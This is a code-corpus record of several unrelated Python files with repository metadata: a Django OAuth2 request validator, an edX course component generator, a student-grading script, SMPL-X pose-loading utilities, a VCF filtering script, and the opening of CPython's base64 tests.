|
anobi/django-oauth-api
|
95bf9b500dab326553a5a8a17d5c6da1a34f6ac4
|
[
"BSD-2-Clause"
] | 4
|
2015-07-30T11:03:54.000Z
|
2017-11-13T15:30:48.000Z
|
import base64
import binascii
from datetime import timedelta
from django.contrib.auth import authenticate
from django.utils import timezone
from oauthlib.oauth2 import RequestValidator
from oauth_api.models import get_application_model, AccessToken, AuthorizationCode, RefreshToken, AbstractApplication
from oauth_api.settings import oauth_api_settings
GRANT_TYPE_MAPPING = {
'authorization_code': (AbstractApplication.GRANT_AUTHORIZATION_CODE,),
'password': (AbstractApplication.GRANT_PASSWORD,),
'client_credentials': (AbstractApplication.GRANT_CLIENT_CREDENTIALS,),
'refresh_token': (AbstractApplication.GRANT_AUTHORIZATION_CODE, AbstractApplication.GRANT_PASSWORD,
AbstractApplication.GRANT_CLIENT_CREDENTIALS)
}
class OAuthValidator(RequestValidator):
def _get_application(self, client_id, request):
"""
Load application instance for given client_id and store it in request as 'client' attribute
"""
assert hasattr(request, 'client'), "'client' attribute missing from 'request'"
Application = get_application_model()
try:
request.client = request.client or Application.objects.get(client_id=client_id)
return request.client
except Application.DoesNotExist:
return None
def _get_auth_string(self, request):
auth = request.headers.get('HTTP_AUTHORIZATION', None)
if not auth:
return None
splitted = auth.split(' ', 1)
if len(splitted) != 2:
return None
auth_type, auth_string = splitted
if auth_type != 'Basic':
return None
return auth_string
def _authenticate_client_basic(self, request):
"""
Try authenticating the client using HTTP Basic Authentication method
"""
auth_string = self._get_auth_string(request)
if not auth_string:
return False
try:
encoding = request.encoding or 'utf-8'
except AttributeError:
encoding = 'utf-8'
try:
b64_decoded = base64.b64decode(auth_string)
except (TypeError, binascii.Error):
return False
try:
auth_string_decoded = b64_decoded.decode(encoding)
except UnicodeDecodeError:
return False
client_id, client_secret = auth_string_decoded.split(':', 1)
if self._get_application(client_id, request) is None:
return False
elif request.client.client_secret != client_secret:
return False
else:
return True
def _authenticate_client_body(self, request):
"""
Try authenticating the client using values from request body
"""
try:
client_id = request.client_id
client_secret = request.client_secret
except AttributeError:
return False
if not client_id:
return False
if self._get_application(client_id, request) is None:
return False
elif request.client.client_secret != client_secret:
return False
else:
return True
def client_authentication_required(self, request, *args, **kwargs):
"""
Determine if client authentication is required for current request.
According to the rfc6749, client authentication is required in the following cases:
- Resource Owner Password Credentials Grant, when Client type is Confidential or when
Client was issued client credentials or whenever Client provided client
authentication, see `Section 4.3.2`_.
- Authorization Code Grant, when Client type is Confidential or when Client was issued
client credentials or whenever Client provided client authentication,
see `Section 4.1.3`_.
- Refresh Token Grant, when Client type is Confidential or when Client was issued
client credentials or whenever Client provided client authentication, see
`Section 6`_
:param request: oauthlib.common.Request
:return: True or False
"""
if self._get_auth_string(request):
return True
try:
if request.client_id and request.client_secret:
return True
except AttributeError:
# Client id or secret not provided
pass
self._get_application(request.client_id, request)
if request.client:
return request.client.client_type == AbstractApplication.CLIENT_CONFIDENTIAL
return super(OAuthValidator, self).client_authentication_required(request, *args, **kwargs)
def authenticate_client(self, request, *args, **kwargs):
"""
Try to authenticate the client.
"""
authenticated = self._authenticate_client_basic(request)
if not authenticated:
authenticated = self._authenticate_client_body(request)
return authenticated
def authenticate_client_id(self, client_id, request, *args, **kwargs):
"""
Ensure client_id belong to a non-confidential client.
A non-confidential client is one that is not required to authenticate through other means, such as using HTTP Basic.
"""
if self._get_application(client_id, request) is not None:
return request.client.client_type != AbstractApplication.CLIENT_CONFIDENTIAL
return False
def confirm_redirect_uri(self, client_id, code, redirect_uri, client, *args, **kwargs):
"""
Ensure client is authorized to redirect to the redirect_uri requested.
"""
auth_code = AuthorizationCode.objects.get(application=client, code=code)
return auth_code.redirect_uri_allowed(redirect_uri)
def get_default_redirect_uri(self, client_id, request, *args, **kwargs):
"""
Get the default redirect URI for the client.
"""
return request.client.default_redirect_uri
def get_default_scopes(self, client_id, request, *args, **kwargs):
"""
Get the default scopes for the client.
"""
return list(oauth_api_settings.SCOPES.keys())
def get_original_scopes(self, refresh_token, request, *args, **kwargs):
"""
Get the list of scopes associated with the refresh token.
"""
return request.refresh_token_object.access_token.scope
def invalidate_authorization_code(self, client_id, code, request, *args, **kwargs):
"""
Invalidate an authorization code after use.
"""
auth_code = AuthorizationCode.objects.get(application=request.client, code=code)
auth_code.delete()
def save_authorization_code(self, client_id, code, request, *args, **kwargs):
"""
Persist the authorization_code.
"""
expires = timezone.now() + timedelta(seconds=oauth_api_settings.ACCESS_TOKEN_EXPIRATION)
AuthorizationCode.objects.create(
application=request.client,
user=request.user,
code=code['code'],
expires=expires,
redirect_uri=request.redirect_uri,
scope=' '.join(request.scopes)
)
return request.redirect_uri
def save_bearer_token(self, token, request, *args, **kwargs):
"""
Persist the Bearer token.
"""
if request.refresh_token:
# Revoke Refresh Token (and related Access Token)
try:
RefreshToken.objects.get(token=request.refresh_token).revoke()
except RefreshToken.DoesNotExist:
# Already revoked?
pass
expires = timezone.now() + timedelta(seconds=oauth_api_settings.ACCESS_TOKEN_EXPIRATION)
user = request.user
if request.grant_type == 'client_credentials':
user = None
access_token = AccessToken.objects.create(
user=user,
scope=token['scope'],
expires=expires,
token=token['access_token'],
application=request.client
)
if 'refresh_token' in token:
if oauth_api_settings.REFRESH_TOKEN_EXPIRATION is not None:
expires = timezone.now() + timedelta(seconds=oauth_api_settings.REFRESH_TOKEN_EXPIRATION)
else:
expires = None
RefreshToken.objects.create(
user=request.user,
token=token['refresh_token'],
expires=expires,
application=request.client,
access_token=access_token
)
return request.client.default_redirect_uri
def revoke_token(self, token, token_type_hint, request, *args, **kwargs):
"""
Revoke an access or refresh token.
:param token: The token string.
:param token_type_hint: access_token or refresh_token.
:param request: The HTTP Request (oauthlib.common.Request)
"""
if token_type_hint not in ['access_token', 'refresh_token']:
token_type_hint = None
token_types = {
'access_token': AccessToken,
'refresh_token': RefreshToken,
}
token_type = token_types.get(token_type_hint, AccessToken)
try:
token_type.objects.get(token=token, application=request.client).revoke()
except token_type.DoesNotExist:
# Lookup from all token types except from already looked up type
other_types = (_type for _type in token_types.values() if _type != token_type)
for other_type in other_types:
for token in other_type.objects.filter(token=token, application=request.client):
token.revoke()
def validate_bearer_token(self, token, scopes, request):
"""
Ensure the Bearer token is valid and authorized access to scopes.
"""
if token is None:
return False
try:
access_token = AccessToken.objects.select_related('application', 'user').get(token=token)
if access_token.is_valid(scopes):
request.client = access_token.application
request.user = access_token.user
request.scopes = scopes
# Required when authenticating using OAuth2Authentication
request.access_token = access_token
return True
return False
except AccessToken.DoesNotExist:
return False
def validate_client_id(self, client_id, request, *args, **kwargs):
"""
Check that and Application exists with given client_id.
"""
return self._get_application(client_id, request) is not None
def validate_code(self, client_id, code, client, request, *args, **kwargs):
"""
Ensure the authorization_code is valid and assigned to client.
"""
try:
auth_code = AuthorizationCode.objects.select_related('user').get(application=client, code=code)
if not auth_code.is_expired:
request.scopes = auth_code.scope.split(' ')
request.user = auth_code.user
return True
return False
except AuthorizationCode.DoesNotExist:
return False
def validate_grant_type(self, client_id, grant_type, client, request, *args, **kwargs):
"""
Ensure client is authorized to use the grant_type requested.
"""
assert (grant_type in GRANT_TYPE_MAPPING)
return request.client.authorization_grant_type in GRANT_TYPE_MAPPING[grant_type]
def validate_redirect_uri(self, client_id, redirect_uri, request, *args, **kwargs):
"""
Ensure client is authorized to redirect to the redirect_uri requested.
"""
return request.client.redirect_uri_allowed(redirect_uri)
def validate_refresh_token(self, refresh_token, client, request, *args, **kwargs):
"""
Ensure the Bearer token is valid and authorized access to scopes.
"""
try:
rt = RefreshToken.objects.select_related('user').get(token=refresh_token)
if not rt.is_expired:
request.user = rt.user
request.refresh_token = rt.token
request.refresh_token_object = rt
return rt.application == client
return False
except RefreshToken.DoesNotExist:
return False
def validate_response_type(self, client_id, response_type, client, request, *args, **kwargs):
"""
Ensure client is authorized to use the response_type requested.
Authorization Endpoint Response Types registry is not supported.
See http://tools.ietf.org/html/rfc6749#section-8.4
"""
if response_type == 'code':
return client.authorization_grant_type == AbstractApplication.GRANT_AUTHORIZATION_CODE
elif response_type == 'token':
return client.authorization_grant_type == AbstractApplication.GRANT_IMPLICIT
else:
return False
def validate_scopes(self, client_id, scopes, client, request, *args, **kwargs):
"""
Ensure the client is authorized access to requested scopes.
"""
return set(scopes).issubset(set(oauth_api_settings.SCOPES.keys()))
def validate_user(self, username, password, client, request, *args, **kwargs):
"""
Ensure the username and password is valid.
"""
user = authenticate(username=username, password=password)
if user is not None and user.is_active:
request.user = user
return True
return False
| 37.364865
| 124
| 0.636166
| 1,495
| 13,825
| 5.694983
| 0.133779
| 0.029128
| 0.037938
| 0.021611
| 0.352831
| 0.281536
| 0.229035
| 0.196148
| 0.180526
| 0.132135
| 0
| 0.003456
| 0.288318
| 13,825
| 369
| 125
| 37.466125
| 0.861876
| 0.189078
| 0
| 0.307339
| 0
| 0
| 0.027343
| 0
| 0
| 0
| 0
| 0
| 0.009174
| 1
| 0.110092
| false
| 0.027523
| 0.036697
| 0
| 0.376147
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1366f50a70db89f7b6f66ff4d8a7cc0516afcf2f
| 6,471
|
py
|
Python
|
edx_gen/_write_comps.py
|
hberndl70/mooc-generator
|
58ff77ece12b456887ec24db79d8baa87ecd5621
|
[
"MIT"
] | null | null | null |
edx_gen/_write_comps.py
|
hberndl70/mooc-generator
|
58ff77ece12b456887ec24db79d8baa87ecd5621
|
[
"MIT"
] | null | null | null |
edx_gen/_write_comps.py
|
hberndl70/mooc-generator
|
58ff77ece12b456887ec24db79d8baa87ecd5621
|
[
"MIT"
] | null | null | null |
import sys, os
import tarfile
import shutil
from edx_gen import _edx_consts
from edx_gen import _read_metadata
from edx_gen import _write_structure
from edx_gen import _write_comps
from edx_gen import _write_comp_html
from edx_gen import _write_comp_checkboxes
from edx_gen import _write_comp_video
from edx_gen import _xml_google_doc
from edx_gen import _markdown
from edx_gen import _util
import __SETTINGS__
#--------------------------------------------------------------------------------------------------
# Text strings
WARNING = " WARNING:"
#--------------------------------------------------------------------------------------------------
# write to either units folder or problems folder, depending on the type
def writeCompsForUnit(md_filepath, unit_filename):
# print("component_path", component_path)
# generate the files in the right folders
tree_snippets = _markdown.convertMd(md_filepath)
# check we have at least 2 snippets, the header and one component
if len(tree_snippets) <= 1:
print(WARNING, 'The markdown file does not seem to contain any components:', md_filepath)
# get the display name of the unit
first_h1_tag = list(tree_snippets[0].iter('h1'))[0]
unit_display_name = first_h1_tag.get('display_name')
# list to store all files
unit_comps = []
# process components
for i in range(1, len(tree_snippets)):
tree_snippet = tree_snippets[i]
# generate the files
new_filename = unit_filename + '_c' + str(i)
comp_files = _writeFilesForSnippet(md_filepath, new_filename, tree_snippet, unit_filename, unit_display_name)
unit_comps.extend(comp_files)
# return the result
return unit_comps
#--------------------------------------------------------------------------------------------------
# write to either units folder or problems folder, depending on the type
def _writeFilesForSnippet(md_filepath, comp_filename, tree_snippet, unit_filename, unit_display_name):
meta_tag = None
comp_type = None
# meta_text = None
# get the h1 tags
h1_tags = list(tree_snippet.iter('h1'))
if len(h1_tags) == 0:
print(WARNING, 'The snippet does not start with any settings:', md_filepath)
return
# get the meta tag for the snippet
meta_tag = h1_tags[0] # the first h1 the should contain the meta data
# # check the meta tag text
# meta_text = meta_tag.text.strip()
# if meta_text == None or meta_text != 'UNIT':
# print(WARNING, 'The markdown file must start with the "UNIT" settings:', component_path)
# print(WARNING, 'Make sure that the first line of the markdown file is blank')
# get the type for this component
comp_type = meta_tag.get('type')
if comp_type == None or comp_type not in _edx_consts.METADATA_ENUMS['type']:
print(WARNING, 'The "type" setting is not recognised:', md_filepath)
print(WARNING, ' Found:', comp_type)
print(WARNING, ' Valid options:', _edx_consts.METADATA_ENUMS['type'])
# write xml and/or html files
if comp_type == 'html':
print(" |_ HTML COMP")
# get the setting out of the meta_tag
settings = _read_metadata.getMetaSettings(md_filepath, meta_tag,
_edx_consts.COMP_HTML_REQ, _edx_consts.COMP_HTML_OPT )
# check that we have settings
if not settings:
print(WARNING, 'There seem to be no settings for this "html" component:', md_filepath)
return
# remove h1 meta_tag from the tree so it does not end up in the output
tree_snippet.remove(meta_tag)
# write .html file to COMP_HTML_FOLDER
# write .xml file to COMP_HTML_FOLDER
# return the list of files
return _write_comp_html.writeXmlForHtmlComp(
md_filepath, comp_filename, tree_snippet, settings, unit_filename)
elif comp_type == 'problem-checkboxes':
print(" |_ PROBLEM CHECKBOXES")
# get the setting out of the meta_tag
settings = _read_metadata.getMetaSettings(md_filepath, meta_tag,
_edx_consts.COMP_PROB_QUIZ_REQ, _edx_consts.COMP_PROB_QUIZ_OPT )
# check that we have settings
if not settings:
print(WARNING, 'There seem to be no settings for this "problem-checkboxes" component:', md_filepath)
return
# remove h1 meta_tag from the tree so it does not end up in the output
tree_snippet.remove(meta_tag)
# write .xml file to COMP_PROBS_FOLDER
# return the list of files
return _write_comp_checkboxes.writeXmlForProbCheckboxesComp(
md_filepath, comp_filename, tree_snippet, settings, unit_filename)
elif comp_type == 'video':
print(" |_ VIDEO COMP")
# get the setting out of the meta_tag
settings = _read_metadata.getMetaSettings(
md_filepath, meta_tag, _edx_consts.COMP_VIDEO_REQ, _edx_consts.COMP_VIDEO_OPT )
# check that we have settings
if not settings:
print(WARNING, 'There seem to be no settings for this "video" component:', md_filepath)
return
# remove h1 meta_tag from the tree so it does not end up in the output
tree_snippet.remove(meta_tag)
# write .xml file to COMP_VIDS_FOLDER
# for each language
# write .html file to COMP_HTML_FOLDER
# write .xml file to COMP_HTML_FOLDER
# return the list of files
return _write_comp_video.writeXmlForVidComp(
md_filepath, comp_filename, settings, unit_filename)
elif comp_type == 'google-doc':
print(" |_ GOOGLE DOC COMP")
# get the setting out of the meta_tag
settings = _read_metadata.getMetaSettings(md_filepath, meta_tag,
_edx_consts.COMP_GOOGLE_DOC_REQ, _edx_consts.COMP_GOOGLE_DOC_OPT)
# check that we have settings
if not settings:
print(WARNING, 'There seem to be no settings for this "Google Doc" component:', md_filepath)
return
# in this case, no files are written
# we return the component tag instead
return _xml_google_doc.tagForGoogleDocComp(comp_filename, settings, unit_filename)
else:
print(WARNING, 'Component type not recognised:', comp_type, "in", md_filepath)
#--------------------------------------------------------------------------------------------------
| 38.064706
| 117
| 0.641323
| 842
| 6,471
| 4.667458
| 0.17696
| 0.035623
| 0.025445
| 0.040712
| 0.50687
| 0.442748
| 0.411959
| 0.411959
| 0.38855
| 0.378117
| 0
| 0.003841
| 0.235667
| 6,471
| 169
| 118
| 38.289941
| 0.79074
| 0.324679
| 0
| 0.209877
| 0
| 0
| 0.138426
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.024691
| false
| 0
| 0.17284
| 0
| 0.308642
| 0.17284
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1367201e3118f25640a5bbd95836976d130709a4
| 2,403
|
py
|
Python
|
grading_program.py
|
ByeonghoonJeon/Student-Grading
|
eee55638aee4390d7758c1204b85cce7279ccdf7
|
[
"MIT"
] | null | null | null |
grading_program.py
|
ByeonghoonJeon/Student-Grading
|
eee55638aee4390d7758c1204b85cce7279ccdf7
|
[
"MIT"
] | null | null | null |
grading_program.py
|
ByeonghoonJeon/Student-Grading
|
eee55638aee4390d7758c1204b85cce7279ccdf7
|
[
"MIT"
] | null | null | null |
# 1. Create students score dictionary.
students_score = {}
# 2. Input student's name and check if input is correct. (Alphabet, period, and blank only.)
# 2.1 Creat a function that evaluate the validity of name.
def check_name(name):
# 2.1.1 Remove period and blank and check it if the name is comprised with only Alphabet.
# 2.1.1.1 Make a list of spelling in the name.
list_of_spelling = list(name)
# 2.1.1.2 Remove period and blank from the list.
while "." in list_of_spelling:
list_of_spelling.remove(".")
while " " in list_of_spelling:
list_of_spelling.remove(" ")
# 2.1.1.3 Convert the list to a string.
list_to_string = ""
list_to_string = list_to_string.join(list_of_spelling)
# 2.1.1.4 Return if the string is Alphabet.
return list_to_string.isalpha()
while True:
# 2.2 Input student's name.
name = input("Please input student's name. \n")
check_name(name)
# 2.3 Check if the name is alphabet. If not, ask to input correct name again.
while check_name(name) != True:
name = input("Please input student's name. (Alphabet and period only.)\n")
# 3. Input student's score and check if input is correct. (digits only and between zero and 100)
score = input(f"Please input {name}'s score.(0 ~ 100)\n")
while score.isdigit() == False or int(score) not in range(0, 101):
score = input("Please input valid numbers only.(Number from zero to 100.)\n")
students_score[name] = score
# 4. Ask another student's information.
another_student = input(
"Do you want to input another student's information as well? (Y/N)\n"
)
while another_student.lower() not in ("yes", "y", "n", "no"):
# 4.1 Check if the input is valid.
another_student = input("Please input Y/N only.\n")
if another_student.lower() in ("yes", "y"):
continue
elif another_student.lower() in ("no", "n"):
break
for student in students_score:
score = students_score[student]
score = int(score)
if score >= 90:
students_score[student] = "A"
elif score in range(70, 90):
students_score[student] = "B"
elif score in range(50, 70):
students_score[student] = "C"
elif score in range(40, 50):
students_score[student] = "D"
else:
students_score[student] = "F"
print(students_score)
| 36.969231
| 100
| 0.646275
| 373
| 2,403
| 4.061662
| 0.243968
| 0.094389
| 0.064686
| 0.044884
| 0.179538
| 0.155776
| 0.124092
| 0.054125
| 0.054125
| 0
| 0
| 0.032364
| 0.241365
| 2,403
| 64
| 101
| 37.546875
| 0.798683
| 0.303787
| 0
| 0
| 0
| 0
| 0.182037
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02381
| false
| 0
| 0
| 0
| 0.047619
| 0.02381
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1368b69e2269d6b7303299c5097db81eca903217
| 6,708
|
py
|
Python
|
extern/smplx_kinect/smplx_kinect/common/avakhitov_utils.py
|
wangxihao/rgbd-kinect-pose
|
03180723c99759ba2500bcd42b5fe7a1d26eb507
|
[
"MIT"
] | 1
|
2022-02-07T06:12:26.000Z
|
2022-02-07T06:12:26.000Z
|
extern/smplx_kinect/smplx_kinect/common/avakhitov_utils.py
|
wangxihao/rgbd-kinect-pose
|
03180723c99759ba2500bcd42b5fe7a1d26eb507
|
[
"MIT"
] | null | null | null |
extern/smplx_kinect/smplx_kinect/common/avakhitov_utils.py
|
wangxihao/rgbd-kinect-pose
|
03180723c99759ba2500bcd42b5fe7a1d26eb507
|
[
"MIT"
] | null | null | null |
import numpy as np
import cv2
import os.path as osp
import json
from human_body_prior.tools.model_loader import load_vposer
import torch
vposer_ckpt = '/Vol1/dbstore/datasets/a.vakhitov/projects/pykinect_fresh/smplify-x/smplify-x-data/vposer_v1_0/'
def load_avakhitov_fits_vposer(vposer, part_path, dev_lbl):
poses = np.load(part_path + '/poses.npy')[:-1]
face_expressions = np.load(part_path + '/expressions.npy')[:-1] * 1e2
betas = np.load(part_path + '/betas.npy')
fid_lst = np.load(part_path + '/fid_lst.npy')
with open(part_path + '/config.json', 'r') as f:
config = json.load(f)
# do we use vposer embeddings
is_vposer = config['is_vposer']
# gender of a subject
is_male = config['is_male']
# id of a device (used to decode the rigid pose of the device)
assert len(fid_lst) == len(poses), f'{len(fid_lst)} != {len(poses)}'
assert len(fid_lst) == len(face_expressions), f'{len(fid_lst)} != {len(face_expressions)}'
n = len(poses)
frame_index2fit_index = {
fid_lst[i]: i
for i in range(n)
}
# load the device pose
dev_lst = config['dev_lst']
dev_id = 0
while dev_lst[dev_id] != dev_lbl:
dev_id += 1
dev_orient = None
dev_trans = None
if dev_id > 0:
dev_orient = np.load(part_path + '/dev_orient.npy')
dev_trans = np.load(part_path + '/dev_trans.npy')
rot = poses[:, -3:]
trans = poses[:, -6:-3]
if is_vposer:
pose_body_vp = torch.tensor(poses[:, 0:32])
# convert from vposer to rotation matrices
pose_body_list = []
for i in range(n):
pose_body_mats = vposer.decode(pose_body_vp[i]).reshape(-1, 3, 3).detach().cpu().numpy()
pose_body = np.zeros(63)
for i in range(0, pose_body_mats.shape[0]):
rot_vec, jac = cv2.Rodrigues(pose_body_mats[i])
pose_body[3 * i: 3 * i + 3] = rot_vec.reshape(-1)
pose_body_list.append(pose_body)
pose_body = np.array(pose_body_list)
pose_jaw = poses[:, 32:35]
pose_eye = poses[:, 35:41]
pose_hand = poses[:, 41:-6]
else:
pose_body = poses[:, 0:63]
pose_jaw = poses[:, 63:66]
pose_eye = poses[:, 66:72]
pose_hand = poses[:, 72:-6]
if dev_orient is not None:
for i in range(n):
rot_mat = cv2.Rodrigues(rot[i].reshape(3, 1))[0]
dev_mat = cv2.Rodrigues(dev_orient.reshape(3, 1))[0]
rot_mat = dev_mat @ rot_mat
rot[i] = cv2.Rodrigues(rot_mat)[0].reshape(-1)
trans[i] = (dev_mat @ trans[i].reshape(3, 1) + dev_trans.reshape(3, 1)).reshape(-1)
result = {
'global_rvec': rot,
'global_tvec': trans,
'body_pose': pose_body,
'hand_pose': pose_hand,
'jaw_pose': pose_jaw,
'eye_pose': pose_eye,
'face_expression': face_expressions,
'betas': betas,
'n': n,
'frame_index2fit_index': frame_index2fit_index,
'is_male': is_male,
'is_vposer': is_vposer
}
return result
def load_avakhitov_fits(dp, load_betas=True, load_body_poses=True, load_expressions=False, load_fid_lst=True):
result = dict()
for flag, k, fn_no_ext in [
[load_betas, 'betas', 'betas'],
[load_body_poses, 'body_poses', 'poses'],
[load_expressions, 'expressions', 'expressions'],
[load_fid_lst, 'fid_lst', 'fid_lst']
]:
if flag:
load_fp = osp.join(dp, f'{fn_no_ext}.npy')
try:
loaded = np.load(load_fp)
except:
print(load_fp)
raise Exception()
if fn_no_ext == 'poses':
#load the vposer model
if loaded.shape[1] == 69:
pose_body = loaded[:, 0:32]
else:
vposer, _ = load_vposer(vposer_ckpt, vp_model='snapshot')
vposer.eval()
pose_body_vp = torch.tensor(loaded[:, 0:32])
#convert from vposer to rotation matrices
pose_body_mats = vposer.decode(pose_body_vp).reshape(len(loaded), -1, 3, 3).detach().cpu().numpy()
pose_body = np.zeros((pose_body_mats.shape[0], 63))
for i in range(0, pose_body_mats.shape[0]):
for j in range(0, pose_body_mats.shape[1]):
rot_vec, jac = cv2.Rodrigues(pose_body_mats[i,j])
pose_body[i, 3*j : 3*j+3] = rot_vec.reshape(-1)
result[k] = pose_body
result['global_rvecs'] = loaded[:, -3:]
result['global_tvecs'] = loaded[:, -6:-3]
result['n'] = len(loaded)
else:
result[k] = loaded
return result
def batch_rodrigues(rot_vecs, epsilon=1e-8, dtype=torch.float32):
''' Calculates the rotation matrices for a batch of rotation vectors
Parameters
----------
rot_vecs: torch.tensor Nx3
array of N axis-angle vectors
Returns
-------
R: torch.tensor Nx3x3
The rotation matrices for the given axis-angle parameters
'''
batch_size = rot_vecs.shape[0]
device = rot_vecs.device
angle = torch.norm(rot_vecs + 1e-8, dim=1, keepdim=True)
rot_dir = rot_vecs / angle
cos = torch.unsqueeze(torch.cos(angle), dim=1)
sin = torch.unsqueeze(torch.sin(angle), dim=1)
# Bx1 arrays
rx, ry, rz = torch.split(rot_dir, 1, dim=1)
K = torch.zeros((batch_size, 3, 3), dtype=dtype, device=device)
zeros = torch.zeros((batch_size, 1), dtype=dtype, device=device)
K = torch.cat([zeros, -rz, ry, rz, zeros, -rx, -ry, rx, zeros], dim=1) \
.view((batch_size, 3, 3))
ident = torch.eye(3, dtype=dtype, device=device).unsqueeze(dim=0)
rot_mat = ident + sin * K + (1 - cos) * torch.bmm(K, K)
return rot_mat
def get_selected_ids(id_sel_set, req_ids):
ss_sort = np.argsort(id_sel_set)
req_sort = np.argsort(req_ids)
id_ss_srt = id_sel_set[ss_sort]
id_ss_pos = np.arange(0, len(id_sel_set))[ss_sort]
req_srt = req_ids[req_sort]
req_srt_pos = -1 * np.ones(len(req_srt), dtype=int)
i = 0
j = 0
while i < len(id_ss_srt) and j < len(req_srt):
if req_srt[j] == id_ss_srt[i]:
req_srt_pos[j] = id_ss_pos[i]
i += 1
j += 1
elif req_srt[j] < id_ss_srt[i]:
j += 1
elif id_ss_srt[i] < req_srt[j]:
i += 1
req_ids_ans = -1 * np.ones(len(req_srt), dtype=int)
req_ids_ans[req_sort] = req_srt_pos
return req_ids_ans
| 35.120419
| 118
| 0.570662
| 978
| 6,708
| 3.679959
| 0.201431
| 0.055571
| 0.026674
| 0.02334
| 0.23312
| 0.145874
| 0.125313
| 0.110031
| 0.080022
| 0.061128
| 0
| 0.02836
| 0.295617
| 6,708
| 190
| 119
| 35.305263
| 0.733333
| 0.073196
| 0
| 0.089041
| 0
| 0.006849
| 0.082681
| 0.022668
| 0
| 0
| 0
| 0
| 0.013699
| 1
| 0.027397
| false
| 0
| 0.041096
| 0
| 0.09589
| 0.006849
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
136925370fda5dbcb2e2d6d5e61c676370502bb7
| 904
|
py
|
Python
|
scripts/VCF/UTILS/select_variants.py
|
elowy01/igsr_analysis
|
ffea4885227c2299f886a4f41e70b6e1f6bb43da
|
[
"Apache-2.0"
] | 3
|
2018-04-20T15:04:34.000Z
|
2022-03-30T06:36:02.000Z
|
scripts/VCF/UTILS/select_variants.py
|
elowy01/igsr_analysis
|
ffea4885227c2299f886a4f41e70b6e1f6bb43da
|
[
"Apache-2.0"
] | 7
|
2019-06-06T09:22:20.000Z
|
2021-11-23T17:41:52.000Z
|
scripts/VCF/UTILS/select_variants.py
|
elowy01/igsr_analysis
|
ffea4885227c2299f886a4f41e70b6e1f6bb43da
|
[
"Apache-2.0"
] | 5
|
2017-11-02T11:17:35.000Z
|
2021-12-11T19:34:09.000Z
|
from VcfFilter import VcfFilter
import argparse
import os
#get command line arguments
parser = argparse.ArgumentParser(description='Script to select a certain variant type from a VCF file')
#parameters
parser.add_argument('--bcftools_folder', type=str, required=True, help='Folder containing the Bcftools binary' )
parser.add_argument('--filename', type=str, required=True, help='Name (without the fullpath) of the VCF file that will be analysed. It assumes that the filename format is for example lc_bams.gatk.xxxx.vcf.gz, where lc_bams is the analysis group and gatk is the method used' )
parser.add_argument('--type', type=str, required=False, help='Type of variant to select. i.e. snps/indels etc' )
args = parser.parse_args()
if __name__ == '__main__':
vcf_f=VcfFilter(vcf=args.filename,bcftools_folder=args.bcftools_folder)
vcf_f.filter_by_variant_type(type=args.type)
| 39.304348
| 275
| 0.766593
| 138
| 904
| 4.862319
| 0.521739
| 0.040238
| 0.076006
| 0.056632
| 0.068554
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.136062
| 904
| 22
| 276
| 41.090909
| 0.859155
| 0.039823
| 0
| 0
| 0
| 0.090909
| 0.446882
| 0.028868
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.272727
| 0
| 0.272727
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13695de67e652f576d889f205ef664189b73d45b
| 14,680
|
py
|
Python
|
site/tests/unittests/test/test_base64.py
|
martinphellwig/brython_wf
|
e169afc1e048cba0c12118b4cd6f109df6fe67c9
|
[
"BSD-3-Clause"
] | 652
|
2015-07-26T00:00:17.000Z
|
2022-02-24T18:30:04.000Z
|
site/tests/unittests/test/test_base64.py
|
martinphellwig/brython_wf
|
e169afc1e048cba0c12118b4cd6f109df6fe67c9
|
[
"BSD-3-Clause"
] | 8
|
2015-09-07T03:38:19.000Z
|
2021-05-23T03:18:51.000Z
|
check-python33-manual/samples/standard_library_337/Lib/test/test_base64.py
|
DaveKaretnyk/parsing-utils2
|
40085bbd399fa605f2f2a4708d385a64ffc907de
|
[
"MIT"
] | 40
|
2015-07-24T19:45:08.000Z
|
2021-11-01T14:54:56.000Z
|
import unittest
from test import support
import base64
import binascii
import os
import sys
import subprocess
class LegacyBase64TestCase(unittest.TestCase):
def test_encodebytes(self):
eq = self.assertEqual
eq(base64.encodebytes(b"www.python.org"), b"d3d3LnB5dGhvbi5vcmc=\n")
eq(base64.encodebytes(b"a"), b"YQ==\n")
eq(base64.encodebytes(b"ab"), b"YWI=\n")
eq(base64.encodebytes(b"abc"), b"YWJj\n")
eq(base64.encodebytes(b""), b"")
eq(base64.encodebytes(b"abcdefghijklmnopqrstuvwxyz"
b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
b"0123456789!@#0^&*();:<>,. []{}"),
b"YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE"
b"RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0\nNT"
b"Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==\n")
